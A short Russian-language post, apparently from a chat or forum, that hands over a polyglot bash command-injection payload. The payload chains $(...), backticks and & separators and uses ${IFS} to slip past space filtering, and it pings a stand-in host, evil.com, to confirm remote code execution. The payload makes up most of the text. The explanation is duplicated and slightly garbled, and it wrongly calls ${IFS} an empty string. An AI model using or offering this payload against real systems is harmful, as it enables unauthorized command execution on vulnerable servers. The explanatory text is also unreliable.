Держи RCE вектор:
При недостаточной фильтрации пользовательских данных, которые попадают в bash интерпритатор, выполнится команда
&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&'\"`0&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&`'При недостаточной фильтрации пользовательских данных, которые попадают в bash интерпритатор, выполнится команда
ping -c evil.com. На случай экранирования пробелов можно использовать ${IFS} - это пустая строка.